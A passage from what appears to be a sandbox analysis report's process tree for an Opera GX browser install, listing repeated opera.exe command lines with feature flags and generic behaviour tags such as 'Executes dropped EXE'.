--with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=1860 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=2112,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:112⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=1632,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=2496 /prefetch:132⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3196,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3204 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=2884,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3248 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=2888,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3212,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3228,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3816,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3824 /prefetch:12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_gx_splash.exe"C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\opera_gx_splash.exe" --instance-name=dbff851fa759ccb33e726f883720ae502⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4224,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4404,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:92⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4456,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4800,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4824,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4964 /prefetch:12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=5228,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:92⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=5768,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:122⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6192,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:142⤵
- Executes dropped EXE
- Modifies registry class
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6492,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6168 /prefetch:92⤵
- Executes dropped EXE
-
-
